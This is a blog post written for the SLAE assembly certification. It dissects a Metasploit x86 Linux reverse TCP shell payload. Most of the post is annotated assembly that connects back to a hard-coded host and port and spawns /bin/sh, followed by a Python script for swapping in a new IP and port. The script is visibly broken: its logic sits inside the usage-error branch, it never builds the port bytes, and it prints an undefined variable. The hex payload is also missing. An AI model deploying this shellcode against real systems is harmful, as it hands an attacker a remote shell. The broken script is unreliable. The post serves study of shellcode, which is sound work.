Back to Posts

Share this post

SLAE – Assignment #2: Reverse TCP Shell

Posted by: voidsec

Reading Time: 3 minutes

Assignment #2: Reverse TCP Shell

Create a shell_reverse_tcp shellcode that connects back to an IP address, on a specific a port and execute a shell. The IP address and port number should be easy configurable.

Again, instead of going for the path of writing a C TCP reverse shell from scratch, I decided to generate a raw Metasploit payload and analyze it with libemu.

Analyzing the Shellcode

All the code is also available on GitHub.

This time the analysis will be a lot shorter due the fact that we can reuse a lot of the code that we had already analyzed the previous assignment.

I’ve generated the graph with libemu in order to simplify our analysis:

Analyzing the image, we can understand that the shellcode needs to perform the following steps:

  1. Create a socket
  2. Duplicate the file descriptors
  3. Connect to the specified IP and port
  4. Execute /bin/sh via execve


;----------- Create Socket ----------------------------
xor ebx,ebx            ; resetting the registers
mul ebx
push ebx               ; 0 (protocol)
inc ebx                ; ebx = 1
push ebx               ; 1 (SOCK_STREAM)
push byte +0x2         ; 2 (AF_INET)
mov ecx,esp            ; ecx = args array struct
mov al,0x66            ; syscall 102 (socketcall)
int 0x80	       ; syscall
;----------- Duplicate the file descriptor ------------
xchg eax,ebx
pop ecx
mov al,0x3f            ; syscall 63 (dup)
int 0x80               ; syscall
dec ecx                ; decrement counter
jns 0x11               ;loop
;----------- Connect -----------------------------------
push dword 0x100a8c0   ; pushing IP address ( 
push dword 0x5c110002  ; pushing port number 4444
mov ecx,esp
mov al,0x66            ; socket syscall
push eax
push ecx
push ebx
mov bl,0x3             ; type of socketcall (3=connect)
mov ecx,esp            ; stack pointer to sockaddr_structure
int 0x80               ; syscall
;----------- Execve -----------------------------------
push edx
push dword 0x68732f6e  ; hs//
push dword 0x69622f2f  ; nib/
mov ebx,esp	       ; ebx = //bin/sh
push edx
push ebx
mov ecx,esp            ; argv = [filename,0]
mov al,0xb             ; syscall 12 (execve)
int 0x80               ; syscall

Here the HEX encoded Metasploit payload:


Knowing that our shellcode was configured for port 4444 (hex 5c11, accounting the endianness) and IP address, I built a simple python script allowing me to easily replace the port and IP address in our shellcode.

# Paolo Stagno aka [VoidSec](
# SLAE-1511
#!/usr/bin/env python

import sys;
if (len(sys.argv) != 3):
  print ("usage: " + sys.argv[0] + " ip port");
  ip = sys.argv[1]
  hip = "\\x"+"\\x".join([hex(int(x)+256)[3:] for x in ip.split('.')])
  port = int(sys.argv[2])
  if port < 0 or port > 65535:
    print "[!] Invalid TCP port number {}, must be between 0-65535".format(port)
# convert to hex and strip 0x
# add an \\x every 2 chars
hport="\\x"+"\\x".join(a+b for a,b in zip(hport[::2],hport[1::2]))


print "Reverse TCP shellcode connecting to {}:{} - {}:{}".format(ip,port,hip,hport)
print "\n"+shellcode

SLAE Exam Statement

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE-1511

Back to Posts